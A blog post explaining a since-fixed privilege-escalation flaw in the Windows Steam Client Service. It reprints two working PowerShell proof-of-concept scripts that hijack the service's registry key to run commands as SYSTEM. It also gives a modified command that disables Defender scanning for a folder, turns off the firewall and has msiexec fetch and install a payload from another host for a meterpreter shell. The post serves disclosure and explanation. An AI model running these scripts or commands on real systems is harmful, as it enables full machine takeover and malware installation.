Update: Now Fixed
Last Wednesday a security researcher named Vasily Kravets published an article [1] detailing a “feature” of the Steam Client Service that could be abused by other programs to escalate their own privileges to that of SYSTEM [2]. SYSTEM is not actually an account, but for the purpose of this post you can think of this as a hidden account which has some additional permissions above the standard Administrator account [3].
After this article was released, another security researcher Matt Nelson published a tweet [4] that contains a link to a PoC (Proof of Concept) PowerShell script [5]. This PowerShell script simulated the steps that any process on your computer could take to elevate itself and achieve SYSTEM permissions.
Here are the contents of the PowerShell script:
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"
I won’t describe what this script does because it was improved somewhat by roflsandwich [6] and I will instead describe that. Just be aware that you SHOULD NOT run the above PowerShell script because it will break steam completely. Unless your working on a VM (Virtual Machine) and backup the registry first, don’t play with it.
Here are the contents of the slightly improved script by roflsandwich:
$cmd = Read-Host -Prompt 'Enter the command you wish to execute as system'
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service will be overwritten"
Write-Host "[*] Modifying the Binary Path on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c $cmd"
Write-Host "[*] Binary Path overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, the command $cmd has been executed"
Write-Host "[*] Restoring Binary Path on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "`"C:\Program Files (x86)\Common Files\Steam\SteamService.exe`" /RunAsService"
Write-Host "[*] Binary Path Restored, restarting the Steam Client Service..."
Get-Service "Steam Client Service" | Restart-Service
Get-Service "Steam Client Service"
Write-Host "[*] Done."
In essence, this script simulates a vulnerability that any program could abuse on any Windows 10 computer with Steam installed. Here is what this script does is;
- Creates a new key HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc which only requires USER permissions to create, but is a symbolic link to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service which has SYSTEM permissions.
- Restarts the Steam Client Service process to elevate the privileges of HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to SYSTEM which also “backs up” the original Steam Client Service key.
- It then replaces the Steam Client Service key contents “C:\Program Files (x86)\Common Files\Steam\SteamService.exe`” /RunAsService” with “C:\Windows\System32\cmd.exe /c $cmd”
- Restarts the Steam Client Service which then executes “C:\Windows\System32\cmd.exe /c $cmd” under SYSTEM privileges.
- Restores the original key value back to “C:\Program Files (x86)\Common Files\Steam\SteamService.exe`” /RunAsService”
- Restarts the Steam Client Service again to restore functionality.
Now you might still be wondering why this is a problem. Having a cmd prompt run under SYSTEM privileges means that any number of things could happen here. Let me illustrate further by modifying one line of code.
Instead of having it execute:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c $cmd"
Let’s execute this instead:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c "cd C:\Users\User\Downloads && powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer' && netsh advfirewall set allprofiles state off && msiexec /q /i http://192.168.1.205/1.msi""
Note: 192.168.1.205 is another machine on my network which has all of the tools I need for penetration testing and security research.
So what exactly does this command do?
- Launches a silent command prompt.
- Changes directory to the Downloads directory.
- Adds an exclusion path (C:\Windows\Installer) for Real-Time Monitoring.
- Disables the firewall completely for all domains. Note: This causes a pop-up and may not even be necessary, I just wanted to highlight the kind of control that the permissions give. You could also probably make this silent.
- Calls msiexec (Windows Installer) to download a payload called 1.msi from my other machine and runs it on the host.
- 1.msi is run which calls back to my computer giving me an interactive meterpreter shell.
- I now have full control over that machine.
Some images to illustrate:
EoP (Escalation of Privilege) vulnerabilities in windows are not uncommon, but in this context this is quite a serious issue. Steam itself is a service for downloading other programs, and is used by approximately 75 million people on Windows 10. The scale of Steam installations makes this a valuable target for malware developers.
Some scenarios where this might be abused include;
- A free game or any other app available on Steam.
- Developers that release a patch for programs you already have installed.
- New programs that you install/run which are aware of this vulnerability.
Obviously this proof of concept only highlights the basics. A malicious program that has been elevated to SYSTEM permissions is probably going to have many different ideas and you would be none the wiser.
Additional Reading:
ArsTechnica
Forbes
The Register
Computing
The Inquirer
Tech Radar
Security Newspaper
Bleeping Computer
References:
[1] https://amonitoring.ru/article/steamclient-0day/
[2] https://docs.microsoft.com/en-us/windows/win32/services/localsystem-account
[3] https://support.microsoft.com/en-gb/help/120929/how-the-system-account-is-used-in-windows
[4] https://twitter.com/enigma0x3/status/1159103239729471488
[5] https://gist.github.com/enigma0x3/03f065be011c5980b96855e2741bf302
[6] https://gist.github.com/roflsandwich/6fb5df2abda912b9d33aad291c9f87de